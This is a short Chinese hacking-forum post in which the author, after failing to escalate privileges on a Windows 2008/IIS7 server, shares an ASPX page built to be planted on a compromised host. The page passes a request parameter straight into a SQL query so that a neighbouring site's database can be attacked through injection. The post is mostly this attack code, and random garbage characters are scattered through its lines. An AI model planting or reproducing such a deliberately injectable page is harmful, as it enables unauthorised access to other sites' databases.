利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
8 a0 |! b+ O& m. b其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
) U6 H9 A# [( D' u% {% s代码量不多，自己写个拉倒了。烦死了。
6 F# o( ^8 ^, {8 _3 n! M5 J
​
- y( o/ o( `) v<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
3 `( X0 K. _7 U/ W( G<body>
    <form id="form1" runat="server">
$ r3 S, }$ w; s  c4 D    <div>
% L) j7 V: Y- `- Y+ S     <script language="c#" runat="server">
/ ^- A$ V/ D# S            
2 K, |  l! A* Q( }) J         void page_init(object sender, EventArgs e)
         {
            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
* h) |5 Z+ N- {0 v+ C4 Y7 J( b2 f             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
            
) B0 O% g/ G' m% X4 N( ?             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
) G; T; y9 k9 o             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
" Z) ]+ e5 K! b2 p1 C5 @             int x = command.ExecuteNonQuery();
) Q* m3 C& U& f7 I' C; q             Response.Write(i+"\n");
( L! d2 ^) {* V! Y; ~* m! p             Response.Write(x);
" q6 L$ t9 z& w# [, f             conn.Close();
. Q; L  ]$ D3 x& ~         }
     
  </script>
    </div>
    </form>
</body>
</html>